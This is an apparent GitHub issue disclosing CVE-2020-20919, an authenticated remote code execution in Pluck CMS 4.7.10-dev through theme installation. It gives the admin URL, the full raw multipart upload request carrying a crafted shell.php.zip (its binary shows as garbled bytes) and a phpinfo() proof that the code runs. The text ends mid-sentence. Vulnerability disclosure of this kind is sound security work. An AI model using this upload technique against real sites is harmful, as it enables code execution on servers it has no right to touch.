Headline
CVE-2020-20919: pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme · Issue #85 · pluck-cms/pluck
File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.
pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme
Demo:
After the installation is successful, go to the management background.
options->choose theme->install theme
vul-url:
http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
According to the default template, the theme is faked with the content of the theme shell.php.zip as follows:
Insert phpinfo(); in the theme.php file;
upload
POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------10771789627341
Content-Length: 2441
-----------------------------10771789627341
Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
Content-Type: application/x-zip-compressed
PK��� 楽VO
shell.php/PK��� � 漇VO?K�? �� � shell.php/info.phpe幧
?�嗭吘肞<j呼?鐴D$$?殟,趱M*侾標7薬p抡U譣??
�?0?z?�N%???
?.?魫G_�?D尞锖i氌`祂?&犇 梿}? ?顪m?c]照j>胜?4A燫m??�桯[?>?�镗G�4慺蓈3阒F魠�?PK��� � 嫇OO蘺貔{� ? � shell.php/style.css誚M彌0�=o~叆≧籞睝毻*?鞧玘zj?�喐k02&洿??�
唋音凿惸虥?笃N溃=??p鴾�^f?r婆
M?险{=箞y&?鞼鑷 A�n圖呔贸&丨^皭b懶l呠|窞糔&x舎?�m桡镛C?;镈$?K?�霥@8[ZPIⅢ?攖K蚊n鴸?簟z�囄R挄h扮?煦tt斤?杞煆驱3:?郚拃伹NMQ2厡h?
檢n垭"荙D长?�?歭?y嬟〕
罸璤h$7+碶ㄤ脩0U蘺A祎A�啀狤Fb群p?&戒虠?]_"鐌舚?@椬-?u?笖<�y 挛銫頥ク�6Do莀茇猰?緂??靷?Jw咁n栽讘<�?Es貦汛竻�覦嬄颖�k墐偝瞆| �!紂[垄
ZN?刅}恶郎溃+=pGU菥|/梿倩?�??MS紮O业Z, 嵻3葥駥 ^蕚Fa??\@泴�?傗?氶﹚�x桷挩?钨(亵袪昀�鯫2?�?蛸�_江陰踴灶歳鐼_鳜og蹪~顳衜碬�K瞍m覐]@-锾?鐠�游J璋梀伶c�;h选To1p?+?0V蠁﹊"鹁襆臣琄b铧;A1籅_ ?IC|??NA�?&�fわ?�姚.潥4�鉵5u尕o蝜?,�?ぢ?蟲?黋 _炧膿胬7?�偶睊�>I*�盡{;Dk�嘜乤遥墽Y摊写縛?駗囐Y昝d脂鷺b闔h|�?蕠瓞F/?霭澅琽瞀盡�k睬辵4_簝I鸜�捚?�O�N扇惋帖�?闂鷍 8?$=睋
瀭?T窰1[�m觊D))
?还^gT�€�郪�3
蚾€i擣 服h爓,(英?
_!婀i線郯*GO�.%W抝�c摫胎?B痤lAⅤ萿酊�PK��� � 筍VO鱪鷸? ? � shell.php/theme.php}S羘贎�=�?橒睩*?9�?�寓:�%FmOh?鉛斓e痗慂褫怠敀驸�蠜麈i<�M?�J�?BY��*F圖?JI�?牟D�\��猟飔;�#!戂d避豸+锳V 顒采}C 嶳 ???BF欇�v;�ot=?
~�?佌鷵繕傉斠Y0?_?�\?<〣剨淫?+V*浚串kЬu瞓K僄?*�襼賞�鍀;?Md9~C?
�-?Mw 撣闭n�?�~鵼��B苪l`敞�7)*f聻?�=6=g|o"�?
3轠aぎMv5奭PB%h,渇擝aS秢瓡w@=適次M适&UB> I剏睵塛詸kX??欎?Ju磛髺禍m祐 灛輁X;
i:.@V 矷F3?u\?笶蒊濧\`t鰨?羭硚鬗�M箔悗?忨T?e�鼈<锌馏���g鐢'U�右\曞5瘹鉙<^�5w琮�PK��? � 楽VO
$ � shell.php/
� � 柭萵€堈�梷Kt€堈�袘€]y堈�PK��? � � 漇VO?K�? �� � $ ( shell.php/info.php
� � �4=t€堈�u�7瘈堈�]�?|堈�PK��? � � 嫇OO蘺貔{� ? � $ �� shell.php/style.css
� � €怷DC冋�)A7瘈堈��l洹|堈�PK��? � � 筍VO鱪鷸? ? � $ ? shell.php/theme.php
� � 9晸€堈�yg7瘈堈�?察z堈�PK�� � � ? ?
-----------------------------10771789627341
Content-Disposition: form-data; name="submit"
Upload
-----------------------------10771789627341--
1.default theme
View site
2.choose shell.php theme
View site http://192.168.80.1/pluck-4.7.10-dev3/
phpinfo();Function is executed
The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version